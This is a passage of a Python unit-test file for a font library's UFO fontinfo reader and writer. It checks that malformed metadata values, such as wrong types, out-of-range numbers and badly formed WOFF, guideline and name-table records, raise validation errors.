self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeVheaCaretSlopeRise
info = dict(fontInfoVersion3)
info["openTypeVheaCaretSlopeRise"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeVheaCaretSlopeRun
info = dict(fontInfoVersion3)
info["openTypeVheaCaretSlopeRun"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# openTypeVheaCaretOffset
info = dict(fontInfoVersion3)
info["openTypeVheaCaretOffset"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
def testFONDRead(self):
# macintoshFONDFamilyID
info = dict(fontInfoVersion3)
info["macintoshFONDFamilyID"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# macintoshFONDName
info = dict(fontInfoVersion3)
info["macintoshFONDName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
def testPostscriptRead(self):
# postscriptFontName
info = dict(fontInfoVersion3)
info["postscriptFontName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# postscriptFullName
info = dict(fontInfoVersion3)
info["postscriptFullName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# postscriptSlantAngle
info = dict(fontInfoVersion3)
info["postscriptSlantAngle"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, info=TestInfoObject())
# postscriptUniqueID
info = dict(fontInfoVersion3)
info["postscriptUniqueID"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptUnderlineThickness
info = dict(fontInfoVersion3)
info["postscriptUnderlineThickness"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptUnderlinePosition
info = dict(fontInfoVersion3)
info["postscriptUnderlinePosition"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptIsFixedPitch
info = dict(fontInfoVersion3)
info["postscriptIsFixedPitch"] = 2
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptBlueValues
## not a list
info = dict(fontInfoVersion3)
info["postscriptBlueValues"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## uneven value count
info = dict(fontInfoVersion3)
info["postscriptBlueValues"] = [500]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## too many values
info = dict(fontInfoVersion3)
info["postscriptBlueValues"] = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptOtherBlues
## not a list
info = dict(fontInfoVersion3)
info["postscriptOtherBlues"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## uneven value count
info = dict(fontInfoVersion3)
info["postscriptOtherBlues"] = [500]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## too many values
info = dict(fontInfoVersion3)
info["postscriptOtherBlues"] = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptFamilyBlues
## not a list
info = dict(fontInfoVersion3)
info["postscriptFamilyBlues"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## uneven value count
info = dict(fontInfoVersion3)
info["postscriptFamilyBlues"] = [500]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## too many values
info = dict(fontInfoVersion3)
info["postscriptFamilyBlues"] = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptFamilyOtherBlues
## not a list
info = dict(fontInfoVersion3)
info["postscriptFamilyOtherBlues"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## uneven value count
info = dict(fontInfoVersion3)
info["postscriptFamilyOtherBlues"] = [500]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## too many values
info = dict(fontInfoVersion3)
info["postscriptFamilyOtherBlues"] = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptStemSnapH
## not list
info = dict(fontInfoVersion3)
info["postscriptStemSnapH"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## too many values
info = dict(fontInfoVersion3)
info["postscriptStemSnapH"] = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptStemSnapV
## not list
info = dict(fontInfoVersion3)
info["postscriptStemSnapV"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## too many values
info = dict(fontInfoVersion3)
info["postscriptStemSnapV"] = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptBlueFuzz
info = dict(fontInfoVersion3)
info["postscriptBlueFuzz"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptBlueShift
info = dict(fontInfoVersion3)
info["postscriptBlueShift"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptBlueScale
info = dict(fontInfoVersion3)
info["postscriptBlueScale"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptForceBold
info = dict(fontInfoVersion3)
info["postscriptForceBold"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptDefaultWidthX
info = dict(fontInfoVersion3)
info["postscriptDefaultWidthX"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptNominalWidthX
info = dict(fontInfoVersion3)
info["postscriptNominalWidthX"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptWeightName
info = dict(fontInfoVersion3)
info["postscriptWeightName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptDefaultCharacter
info = dict(fontInfoVersion3)
info["postscriptDefaultCharacter"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptWindowsCharacterSet
info = dict(fontInfoVersion3)
info["postscriptWindowsCharacterSet"] = -1
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# macintoshFONDFamilyID
info = dict(fontInfoVersion3)
info["macintoshFONDFamilyID"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# macintoshFONDName
info = dict(fontInfoVersion3)
info["macintoshFONDName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
def testWOFFRead(self):
    """Validate reading of the WOFF attributes in fontinfo.plist.

    Each case writes fontInfoVersion3 with one WOFF attribute replaced
    (or removed), then reads it back: valid data must load cleanly,
    invalid data must raise UFOLibError.
    """
    _DELETE = object()  # sentinel: remove the attribute instead of setting it
    # (attribute, value, isValid) triples, checked one at a time.
    cases = [
        # version numbers must be integers
        ("woffMajorVersion", 1.0, False),
        ("woffMajorVersion", "abc", False),
        ("woffMinorVersion", 1.0, False),
        ("woffMinorVersion", "abc", False),
        # woffMetadataUniqueID
        ("woffMetadataUniqueID", _DELETE, True),  # attribute is optional
        ("woffMetadataUniqueID", 1, False),  # not a dict
        ("woffMetadataUniqueID", {"id": "foo", "notTheRightKey": 1}, False),
        ("woffMetadataUniqueID", {}, False),  # no id
        ("woffMetadataUniqueID", {"id": 1}, False),  # id not a string
        ("woffMetadataUniqueID", {"id": ""}, True),  # empty id is allowed
        # woffMetadataVendor
        ("woffMetadataVendor", {"url": "foo"}, False),  # no name
        ("woffMetadataVendor", {"name": 1, "url": "foo"}, False),
        ("woffMetadataVendor", {"name": "", "url": "foo"}, True),
        ("woffMetadataVendor", {"name": "foo"}, True),  # url is optional
        ("woffMetadataVendor", {"name": "foo", "url": 1}, False),
        ("woffMetadataVendor", {"name": "foo", "url": ""}, True),
        ("woffMetadataVendor", {"name": "foo", "url": "bar", "dir": "ltr"}, True),
        ("woffMetadataVendor", {"name": "foo", "url": "bar", "dir": "rtl"}, True),
        ("woffMetadataVendor", {"name": "foo", "url": "bar", "dir": 1}, False),
        ("woffMetadataVendor", {"name": "foo", "url": "bar", "dir": "utd"}, False),
        ("woffMetadataVendor", {"name": "foo", "url": "bar", "class": "hello"}, True),
        ("woffMetadataVendor", {"name": "foo", "url": "bar", "class": 1}, False),
        ("woffMetadataVendor", {"name": "foo", "url": "bar", "class": ""}, True),
        # woffMetadataCredits
        ("woffMetadataCredits", {}, False),  # credits attribute required
        ("woffMetadataCredits", {"credits": [{"name": "foo"}], "notTheRightKey": 1}, False),
        ("woffMetadataCredits", {"credits": "abc"}, False),  # not a list
        ("woffMetadataCredits", {"credits": []}, False),  # empty list
        ("woffMetadataCredits", {"credits": ["abc"]}, False),  # item not a dict
        ("woffMetadataCredits", {"credits": [{"name": "foo", "notTheRightKey": 1}]}, False),
        ("woffMetadataCredits", {"credits": [{"url": "foo"}]}, False),  # no name
        ("woffMetadataCredits", {"credits": [{"name": 1}]}, False),
        ("woffMetadataCredits", {"credits": [{"name": "foo", "url": 1}]}, False),
        ("woffMetadataCredits", {"credits": [{"name": "foo", "role": 1}]}, False),
        ("woffMetadataCredits", {"credits": [{"name": "foo", "dir": 1}]}, False),
        ("woffMetadataCredits", {"credits": [{"name": "foo", "dir": "utd"}]}, False),
        ("woffMetadataCredits", {"credits": [{"name": "foo", "class": 1}]}, False),
        # woffMetadataDescription
        ("woffMetadataDescription", {"text": [{"text": "foo"}]}, True),  # url optional
        ("woffMetadataDescription", {"text": [{"text": "foo"}], "url": 1}, False),
        ("woffMetadataDescription", {"url": "foo"}, False),  # text required
        ("woffMetadataDescription", {"text": "abc"}, False),  # text not a list
        ("woffMetadataDescription", {"text": ["abc"]}, False),  # item not a dict
        ("woffMetadataDescription", {"text": [{"text": "foo", "notTheRightKey": 1}]}, False),
        ("woffMetadataDescription", {"text": [{"language": "foo"}]}, False),
        ("woffMetadataDescription", {"text": [{"text": 1}]}, False),
        ("woffMetadataDescription", {"text": [{"text": "foo", "url": 1}]}, False),
        ("woffMetadataDescription", {"text": [{"text": "foo", "language": 1}]}, False),
        ("woffMetadataDescription", {"text": [{"text": "foo", "dir": "utd"}]}, False),
        ("woffMetadataDescription", {"text": [{"text": "foo", "class": 1}]}, False),
        # woffMetadataLicense
        ("woffMetadataLicense", {"text": [{"text": "foo"}]}, True),  # url optional
        ("woffMetadataLicense", {"text": [{"text": "foo"}], "url": 1}, False),
        ("woffMetadataLicense", {"text": [{"text": "foo"}], "id": 1}, False),
        ("woffMetadataLicense", {"url": "foo"}, True),  # text optional here
        ("woffMetadataLicense", {"text": "abc"}, False),  # text not a list
        ("woffMetadataLicense", {"text": ["abc"]}, False),  # item not a dict
        ("woffMetadataLicense", {"text": [{"text": "foo", "notTheRightKey": 1}]}, False),
        ("woffMetadataLicense", {"text": [{"language": "foo"}]}, False),
        ("woffMetadataLicense", {"text": [{"text": 1}]}, False),
        ("woffMetadataLicense", {"text": [{"text": "foo", "url": 1}]}, False),
        ("woffMetadataLicense", {"text": [{"text": "foo", "language": 1}]}, False),
        ("woffMetadataLicense", {"text": [{"text": "foo", "dir": "utd"}]}, False),
        ("woffMetadataLicense", {"text": [{"text": "foo", "class": 1}]}, False),
        # woffMetadataLicensee
        ("woffMetadataLicensee", {}, False),  # name required
        ("woffMetadataLicensee", {"name": "foo", "notTheRightKey": 1}, False),
        ("woffMetadataLicensee", {"name": 1}, False),
        ("woffMetadataLicensee", {"name": "foo", "dir": "ltr"}, True),
        ("woffMetadataLicensee", {"name": "foo", "dir": "rtl"}, True),
        ("woffMetadataLicensee", {"name": "foo", "dir": "utd"}, False),
        ("woffMetadataLicensee", {"name": "foo", "class": "hello"}, True),
        ("woffMetadataLicensee", {"name": "foo", "class": 1}, False),
    ]
    # Copyright and trademark share the same text-record validation rules.
    for attribute in ("woffMetadataCopyright", "woffMetadataTrademark"):
        cases.extend([
            (attribute, {"text": [{"text": "foo"}], "notTheRightKey": 1}, False),
            (attribute, {}, False),  # text required
            (attribute, {"text": "abc"}, False),  # text not a list
            (attribute, {"text": ["abc"]}, False),  # item not a dict
            (attribute, {"text": [{"text": "foo", "notTheRightKey": 1}]}, False),
            (attribute, {"text": [{"language": "foo"}]}, False),  # missing text
            (attribute, {"text": [{"text": 1}]}, False),
            (attribute, {"text": [{"text": "foo", "url": 1}]}, False),
            (attribute, {"text": [{"text": "foo", "language": 1}]}, False),
            (attribute, {"text": [{"text": "foo", "dir": "utd"}]}, False),
            (attribute, {"text": [{"text": "foo", "class": 1}]}, False),
        ])
    for attribute, value, isValid in cases:
        info = dict(fontInfoVersion3)
        if value is _DELETE:
            del info[attribute]
        else:
            info[attribute] = value
        self._writeInfoToPlist(info)
        reader = UFOReader(self.dstDir)
        if isValid:
            reader.readInfo(TestInfoObject())
        else:
            self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
def testGuidelinesRead(self):
    """Every malformed guideline in fontinfo.plist must raise UFOLibError.

    Covers bad x/y types, out-of-range angles, bad name/color types,
    malformed color strings, and duplicate identifiers.
    """
    # Each entry is one invalid guideline dict.
    badGuidelines = [
        {"x": "1"},  # x not an int or float
        {"y": "1"},  # y not an int or float
        {"x": 0, "y": 0, "angle": -1},  # angle < 0
        {"x": 0, "y": 0, "angle": 361},  # angle > 360
        {"x": 0, "name": 1},  # name not a string
        {"x": 0, "color": 1},  # color not a string
        # color: not enough commas
        {"x": 0, "color": "1 0, 0, 0"},
        {"x": 0, "color": "1 0 0, 0"},
        {"x": 0, "color": "1 0 0 0"},
        # color: missing components
        {"x": 0, "color": ", 0, 0, 0"},
        {"x": 0, "color": "1, , 0, 0"},
        {"x": 0, "color": "1, 0, , 0"},
        {"x": 0, "color": "1, 0, 0, "},
        {"x": 0, "color": ", , , "},
        # color: non-numeric component in each position
        {"x": 0, "color": "r, 1, 1, 1"},
        {"x": 0, "color": "1, g, 1, 1"},
        {"x": 0, "color": "1, 1, b, 1"},
        {"x": 0, "color": "1, 1, 1, a"},
        # color: too many components
        {"x": 0, "color": "1, 0, 0, 0, 0"},
        # color: component < 0 in each position
        {"x": 0, "color": "-1, 0, 0, 0"},
        {"x": 0, "color": "0, -1, 0, 0"},
        {"x": 0, "color": "0, 0, -1, 0"},
        {"x": 0, "color": "0, 0, 0, -1"},
        # color: component > 1 in each position
        {"x": 0, "color": "2, 0, 0, 0"},
        {"x": 0, "color": "0, 2, 0, 0"},
        {"x": 0, "color": "0, 0, 2, 0"},
        {"x": 0, "color": "0, 0, 0, 2"},
    ]
    guidelineLists = [[guideline] for guideline in badGuidelines]
    # Duplicate identifier across two guidelines is also invalid.
    guidelineLists.append(
        [{"x": 0, "identifier": "guide1"}, {"y": 0, "identifier": "guide1"}]
    )
    for guidelines in guidelineLists:
        info = dict(fontInfoVersion3)
        info["guidelines"] = guidelines
        self._writeInfoToPlist(info)
        reader = UFOReader(self.dstDir)
        self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
class WriteFontInfoVersion3TestCase(unittest.TestCase):
def setUp(self):
self.tempDir = tempfile.mktemp()
os.mkdir(self.tempDir)
self.dstDir = os.path.join(self.tempDir, "test.ufo")
def tearDown(self):
shutil.rmtree(self.tempDir)
def tearDownUFO(self):
if os.path.exists(self.dstDir):
shutil.rmtree(self.dstDir)
def makeInfoObject(self):
    """Return a TestInfoObject populated with every fontInfoVersion3 value."""
    info = TestInfoObject()
    for attribute, value in fontInfoVersion3.items():
        setattr(info, attribute, value)
    return info
def readPlist(self):
    """Parse and return the fontinfo.plist written into the destination UFO.

    The unqualified readPlist(...) call below resolves to the
    module-level plist reader, not to this method.
    """
    plistPath = os.path.join(self.dstDir, "fontinfo.plist")
    with open(plistPath, "rb") as fileObj:
        data = readPlist(fileObj)
    return data
def testWrite(self):
    """A fully populated info object round-trips through writeInfo unchanged."""
    infoObject = self.makeInfoObject()
    writer = UFOWriter(self.dstDir, formatVersion=3)
    writer.writeInfo(infoObject)
    written = self.readPlist()
    # Every attribute must come back exactly as it went in.
    for attribute, expected in fontInfoVersion3.items():
        self.assertEqual(written[attribute], expected)
    self.tearDownUFO()
def testGenericWrite(self):
    """writeInfo must reject invalid values for the generic attributes.

    Each case sets a single attribute to a bad value on an otherwise
    valid info object and expects UFOLibError from writeInfo.
    """
    # (attribute, invalid value) pairs.
    badValues = [
        ("familyName", 123),
        ("styleName", 123),
        ("styleMapFamilyName", 123),
        ("styleMapStyleName", 123),  # not a string
        ("styleMapStyleName", "REGULAR"),  # not in the allowed value set
        ("versionMajor", "1"),
        ("versionMinor", "0"),
        ("copyright", 123),
        ("trademark", 123),
        ("unitsPerEm", "abc"),
        ("descender", "abc"),
        ("xHeight", "abc"),
        ("capHeight", "abc"),
        ("ascender", "abc"),
        ("italicAngle", "abc"),
    ]
    for attribute, badValue in badValues:
        infoObject = self.makeInfoObject()
        setattr(infoObject, attribute, badValue)
        writer = UFOWriter(self.dstDir, formatVersion=3)
        self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
        self.tearDownUFO()
def testGaspWrite(self):
    """Validate writer handling of fontinfo openTypeGaspRangeRecords.

    Records must be a list of dicts with rangeMaxPPEM (int) and
    rangeGaspBehavior (list of valid bit numbers), sorted by ppem.
    An empty list and a list without a 0xFFFF record are both allowed.
    """

    def writeRecords(value, expectFailure):
        # Build a fresh info object carrying the candidate value and try
        # to write it; invalid values must raise UFOLibError.
        infoObject = self.makeInfoObject()
        infoObject.openTypeGaspRangeRecords = value
        writer = UFOWriter(self.dstDir, formatVersion=3)
        if expectFailure:
            self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
        else:
            writer.writeInfo(infoObject)
        self.tearDownUFO()

    # not a list
    writeRecords("abc", True)
    # empty list is acceptable
    writeRecords([], False)
    # list member is not a dict
    writeRecords(["abc"], True)
    # dict not properly formatted (unexpected/missing keys)
    writeRecords([dict(rangeMaxPPEM=0xFFFF, notTheRightKey=1)], True)
    writeRecords([dict(notTheRightKey=1, rangeGaspBehavior=[0])], True)
    # ppem is not an int
    writeRecords(
        [dict(rangeMaxPPEM="abc", rangeGaspBehavior=[0]),
         dict(rangeMaxPPEM=0xFFFF, rangeGaspBehavior=[0])],
        True)
    # behavior is not a list
    writeRecords(
        [dict(rangeMaxPPEM=10, rangeGaspBehavior="abc"),
         dict(rangeMaxPPEM=0xFFFF, rangeGaspBehavior=[0])],
        True)
    # behavior value out of range
    writeRecords(
        [dict(rangeMaxPPEM=10, rangeGaspBehavior=[-1]),
         dict(rangeMaxPPEM=0xFFFF, rangeGaspBehavior=[0])],
        True)
    # records not sorted by ppem
    writeRecords(
        [dict(rangeMaxPPEM=0xFFFF, rangeGaspBehavior=[0]),
         dict(rangeMaxPPEM=10, rangeGaspBehavior=[0])],
        True)
    # missing 0xFFFF record is permitted
    writeRecords(
        [dict(rangeMaxPPEM=10, rangeGaspBehavior=[0]),
         dict(rangeMaxPPEM=20, rangeGaspBehavior=[0])],
        False)
def testHeadWrite(self):
    """head-table fontinfo attributes must reject malformed values."""
    invalidPairs = [
        # openTypeHeadCreated must be a string ...
        ("openTypeHeadCreated", 123),
        # ... in the expected date format
        ("openTypeHeadCreated", "2000-Jan-01 00:00:00"),
        # openTypeHeadLowestRecPPEM must be a number, not a string
        ("openTypeHeadLowestRecPPEM", "abc"),
        # openTypeHeadFlags bit numbers must be valid (non-negative)
        ("openTypeHeadFlags", [-1]),
    ]
    for attr, badValue in invalidPairs:
        infoObject = self.makeInfoObject()
        setattr(infoObject, attr, badValue)
        writer = UFOWriter(self.dstDir, formatVersion=3)
        self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
        self.tearDownUFO()
def testHheaWrite(self):
    """All hhea fontinfo attributes are numeric; strings must be rejected."""
    numericAttrs = (
        "openTypeHheaAscender",
        "openTypeHheaDescender",
        "openTypeHheaLineGap",
        "openTypeHheaCaretSlopeRise",
        "openTypeHheaCaretSlopeRun",
        "openTypeHheaCaretOffset",
    )
    for attr in numericAttrs:
        # a string value should make writeInfo fail for every attribute
        infoObject = self.makeInfoObject()
        setattr(infoObject, attr, "abc")
        writer = UFOWriter(self.dstDir, formatVersion=3)
        self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
        self.tearDownUFO()
def testNameWrite(self):
    """name-table fontinfo attributes and openTypeNameRecords validation.

    The simple openTypeName* attributes must be strings.
    openTypeNameRecords must be a list of dicts with exactly the keys
    nameID/platformID/encodingID/languageID (ints) and string (str).
    Duplicate records are accepted by the writer.
    """

    def assertWriteFails(infoObject):
        # Writing invalid data must raise UFOLibError; always clean up
        # the destination directory afterwards.
        writer = UFOWriter(self.dstDir, formatVersion=3)
        self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
        self.tearDownUFO()

    # simple string attributes: an int is not an acceptable value
    stringAttrs = (
        "openTypeNameDesigner",
        "openTypeNameDesignerURL",
        "openTypeNameManufacturer",
        "openTypeNameManufacturerURL",
        "openTypeNameLicense",
        "openTypeNameLicenseURL",
        "openTypeNameVersion",
        "openTypeNameUniqueID",
        "openTypeNameDescription",
        "openTypeNamePreferredFamilyName",
        "openTypeNamePreferredSubfamilyName",
        "openTypeNameCompatibleFullName",
        "openTypeNameSampleText",
        "openTypeNameWWSFamilyName",
        "openTypeNameWWSSubfamilyName",
    )
    for attr in stringAttrs:
        infoObject = self.makeInfoObject()
        setattr(infoObject, attr, 123)
        assertWriteFails(infoObject)

    # openTypeNameRecords: each entry below is an invalid value
    invalidRecordValues = [
        # not a list
        "abc",
        # list member is not a dict
        ["abc"],
        # invalid dict structure
        [dict(foo="bar")],
        # unexpected extra key
        [dict(nameID=1, platformID=1, encodingID=1, languageID=1, string="Name Record.", foo="bar")],
        # each required key missing in turn
        [dict(platformID=1, encodingID=1, languageID=1, string="Name Record.")],
        [dict(nameID=1, encodingID=1, languageID=1, string="Name Record.")],
        [dict(nameID=1, platformID=1, languageID=1, string="Name Record.")],
        [dict(nameID=1, platformID=1, encodingID=1, string="Name Record.")],
        [dict(nameID=1, platformID=1, encodingID=1, languageID=1)],
        # wrong value type for each key in turn
        [dict(nameID="1", platformID=1, encodingID=1, languageID=1, string="Name Record.")],
        [dict(nameID=1, platformID="1", encodingID=1, languageID=1, string="Name Record.")],
        [dict(nameID=1, platformID=1, encodingID="1", languageID=1, string="Name Record.")],
        [dict(nameID=1, platformID=1, encodingID=1, languageID="1", string="Name Record.")],
        [dict(nameID=1, platformID=1, encodingID=1, languageID=1, string=1)],
    ]
    for value in invalidRecordValues:
        infoObject = self.makeInfoObject()
        infoObject.openTypeNameRecords = value
        assertWriteFails(infoObject)

    # duplicate records are not an error
    infoObject = self.makeInfoObject()
    infoObject.openTypeNameRecords = [
        dict(nameID=1, platformID=1, encodingID=1, languageID=1, string="Name Record."),
        dict(nameID=1, platformID=1, encodingID=1, languageID=1, string="Name Record.")
    ]
    writer = UFOWriter(self.dstDir, formatVersion=3)
    writer.writeInfo(infoObject)
    # Fix: tearDownUFO was missing here, unlike every other case in this
    # file, leaving the freshly written UFO on disk for later tests.
    self.tearDownUFO()
def testOS2Write(self):
    """OS/2-table fontinfo attributes must reject out-of-spec values."""
    invalidPairs = [
        # openTypeOS2WidthClass: not an int, then out of range
        ("openTypeOS2WidthClass", "abc"),
        ("openTypeOS2WidthClass", 15),
        # openTypeOS2WeightClass: not an int, then out of range
        ("openTypeOS2WeightClass", "abc"),
        ("openTypeOS2WeightClass", -50),
        # selection bits must be valid (non-negative)
        ("openTypeOS2Selection", [-1]),
        # vendor ID must be a string
        ("openTypeOS2VendorID", 1234),
        # panose: non-int member, too few values, too many values
        ("openTypeOS2Panose", [0, 1, 2, 3, 4, 5, 6, 7, 8, str(9)]),
        ("openTypeOS2Panose", [0, 1, 2, 3]),
        ("openTypeOS2Panose", [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]),
        # family class: non-int member, wrong length, out-of-range value
        ("openTypeOS2FamilyClass", [0, str(1)]),
        ("openTypeOS2FamilyClass", [1]),
        ("openTypeOS2FamilyClass", [1, 1, 1]),
        ("openTypeOS2FamilyClass", [1, 20]),
        # unicode/code page range bits: non-int member, negative bit
        ("openTypeOS2UnicodeRanges", ["0"]),
        ("openTypeOS2UnicodeRanges", [-1]),
        ("openTypeOS2CodePageRanges", ["0"]),
        ("openTypeOS2CodePageRanges", [-1]),
        # typo metrics must be numbers
        ("openTypeOS2TypoAscender", "abc"),
        ("openTypeOS2TypoDescender", "abc"),
        ("openTypeOS2TypoLineGap", "abc"),
        # win metrics must be non-negative numbers
        ("openTypeOS2WinAscent", "abc"),
        ("openTypeOS2WinAscent", -1),
        ("openTypeOS2WinDescent", "abc"),
        ("openTypeOS2WinDescent", -1),
        # fsType bits: non-int member, negative bit
        ("openTypeOS2Type", ["1"]),
        ("openTypeOS2Type", [-1]),
        # remaining metric attributes must be numbers
        ("openTypeOS2SubscriptXSize", "abc"),
        ("openTypeOS2SubscriptYSize", "abc"),
        ("openTypeOS2SubscriptXOffset", "abc"),
        ("openTypeOS2SubscriptYOffset", "abc"),
        ("openTypeOS2SuperscriptXSize", "abc"),
        ("openTypeOS2SuperscriptYSize", "abc"),
        ("openTypeOS2SuperscriptXOffset", "abc"),
        ("openTypeOS2SuperscriptYOffset", "abc"),
        ("openTypeOS2StrikeoutSize", "abc"),
        ("openTypeOS2StrikeoutPosition", "abc"),
    ]
    for attr, badValue in invalidPairs:
        infoObject = self.makeInfoObject()
        setattr(infoObject, attr, badValue)
        writer = UFOWriter(self.dstDir, formatVersion=3)
        self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
        self.tearDownUFO()
def testVheaWrite(self):
    """All vhea fontinfo attributes are numeric; strings must be rejected."""
    numericAttrs = (
        "openTypeVheaVertTypoAscender",
        "openTypeVheaVertTypoDescender",
        "openTypeVheaVertTypoLineGap",
        "openTypeVheaCaretSlopeRise",
        "openTypeVheaCaretSlopeRun",
        "openTypeVheaCaretOffset",
    )
    for attr in numericAttrs:
        # a string value should make writeInfo fail for every attribute
        infoObject = self.makeInfoObject()
        setattr(infoObject, attr, "abc")
        writer = UFOWriter(self.dstDir, formatVersion=3)
        self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
        self.tearDownUFO()
def testFONDWrite(self):
    """FOND fontinfo attributes: family ID is a number, name is a string."""
    invalidPairs = (
        ("macintoshFONDFamilyID", "abc"),  # must be an int
        ("macintoshFONDName", 123),        # must be a string
    )
    for attr, badValue in invalidPairs:
        infoObject = self.makeInfoObject()
        setattr(infoObject, attr, badValue)
        writer = UFOWriter(self.dstDir, formatVersion=3)
        self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
        self.tearDownUFO()
def testPostscriptWrite(self):
    """postscript fontinfo attributes must reject out-of-spec values.

    Blue-zone lists must have an even number of entries up to 14;
    stem-snap lists are capped at 12 entries. Every case below is
    expected to raise UFOLibError from writeInfo.
    """
    # a list with too many entries for both the blue and stem attributes
